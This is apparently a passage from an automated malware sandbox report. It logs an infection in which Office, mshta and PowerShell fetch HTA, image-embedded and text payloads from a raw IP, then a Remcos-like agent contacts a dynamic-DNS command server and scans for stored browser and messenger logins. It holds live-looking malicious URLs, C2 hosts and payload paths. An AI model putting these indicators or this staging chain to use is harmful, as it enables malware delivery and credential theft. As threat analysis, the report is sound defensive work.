                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 192.3.220.40:80 -> 192.168.2.22:49171
                    Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 192.3.220.40:80 -> 192.168.2.22:49171
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49173 -> 135.148.195.248:6875
                    Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49172 -> 192.3.220.40:80
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49174 -> 135.148.195.248:6875
                    Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 192.3.220.40:80 -> 192.168.2.22:49177
                    Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 192.3.220.40:80 -> 192.168.2.22:49177
                    Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.227.242:443 -> 192.168.2.22:49166
                    Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.227.242:443 -> 192.168.2.22:49176
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: idabo.duckdns.org
                    Uses dynamic DNS services
                    Source: unknownDNS query: name: idabo.duckdns.org
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 135.148.195.248:6875
                    Source: global trafficHTTP traffic detected: GET /32/items/detah-note-v_202410/DetahNote_V.jpg HTTP/1.1Host: ia600102.us.archive.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /32/items/detah-note-v_202410/DetahNote_V.jpg HTTP/1.1Host: ia600102.us.archive.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /330/RRCGGH.txt HTTP/1.1Host: 192.3.220.40Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /330/RRCGGH.txt HTTP/1.1Host: 192.3.220.40Connection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 135.148.195.248 135.148.195.248
                    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                    Source: Joe Sandbox ViewASN Name: AVAYAUS AVAYAUS
                    Source: Joe Sandbox ViewASN Name: INTERNET-ARCHIVEUS INTERNET-ARCHIVEUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49175 -> 178.237.33.50:80
                    Source: global trafficHTTP traffic detected: GET /EhYykL HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wrath.meConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /EhYykL HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wrath.meConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /EhYykL HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wrath.meConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /EhYykL HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wrath.meConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /330/uh/newthingtobeonlinefor.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.220.40Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /330/uh/newthingtobeonlinefor.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.3.220.40If-Range: "1d7e1-623f1fc7dcdfc"
                    Source: global trafficHTTP traffic detected: GET /330/verybestthingswesharedfornew.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.220.40Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /330/uh/newthingtobeonlinefor.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Tue, 08 Oct 2024 07:21:30 GMTConnection: Keep-AliveHost: 192.3.220.40If-None-Match: "1d7e1-623f1fc7dcdfc"
                    Source: unknownHTTPS traffic detected: 207.241.227.242:443 -> 192.168.2.22:49166 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 207.241.227.242:443 -> 192.168.2.22:49176 version: TLS 1.0
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE89957018 URLDownloadToFileW,7_2_000007FE89957018
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5044CFE0.emfJump to behavior
                    Source: global trafficHTTP traffic detected: GET /EhYykL HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wrath.meConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /EhYykL HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wrath.meConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /32/items/detah-note-v_202410/DetahNote_V.jpg HTTP/1.1Host: ia600102.us.archive.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /EhYykL HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wrath.meConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /EhYykL HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wrath.meConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /32/items/detah-note-v_202410/DetahNote_V.jpg HTTP/1.1Host: ia600102.us.archive.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /330/uh/newthingtobeonlinefor.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.220.40Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /330/uh/newthingtobeonlinefor.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.3.220.40If-Range: "1d7e1-623f1fc7dcdfc"
                    Source: global trafficHTTP traffic detected: GET /330/verybestthingswesharedfornew.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.220.40Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /330/RRCGGH.txt HTTP/1.1Host: 192.3.220.40Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /330/uh/newthingtobeonlinefor.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Tue, 08 Oct 2024 07:21:30 GMTConnection: Keep-AliveHost: 192.3.220.40If-None-Match: "1d7e1-623f1fc7dcdfc"
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /330/RRCGGH.txt HTTP/1.1Host: 192.3.220.40Connection: Keep-Alive
                    Source: bhv8392.tmp.21.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
                    Source: RegAsm.exe, 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                    Source: RegAsm.exe, RegAsm.exe, 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                    Source: RegAsm.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: bhv8392.tmp.21.drString found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                    Source: RegAsm.exe, 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                    Source: RegAsm.exe, 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                    Source: global trafficDNS traffic detected: DNS query: wrath.me
                    Source: global trafficDNS traffic detected: DNS query: ia600102.us.archive.org
                    Source: global trafficDNS traffic detected: DNS query: idabo.duckdns.org
                    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                    Source: powershell.exe, 0000000E.00000002.473005129.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.517043980.00000000026A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40
                    Source: mshta.exe, 00000004.00000002.442847727.0000000003328000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.0000000003328000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/
                    Source: mshta.exe, 00000004.00000002.442847727.0000000003328000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.0000000003328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/$
                    Source: powershell.exe, 0000000E.00000002.473005129.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.517043980.00000000026A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/RRCGGH.txt
                    Source: mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488616620.0000000003955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473378608.00000000002DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/uh/newthingtobeonlinefor.hta
                    Source: mshta.exe, 00000004.00000003.438571721.0000000003301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.442847727.0000000003301000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/uh/newthingtobeonlinefor.hta3
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/uh/newthingtobeonlinefor.hta=3
                    Source: mshta.exe, 0000000F.00000003.475518596.00000000039E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473077604.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487910407.00000000039E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488694148.00000000039E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/uh/newthingtobeonlinefor.htaC:
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/uh/newthingtobeonlinefor.htaP3
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/uh/newthingtobeonlinefor.htaY3
                    Source: mshta.exe, 0000000F.00000003.487881018.0000000003955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488616620.0000000003955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/uh/newthingtobeonlinefor.htaes
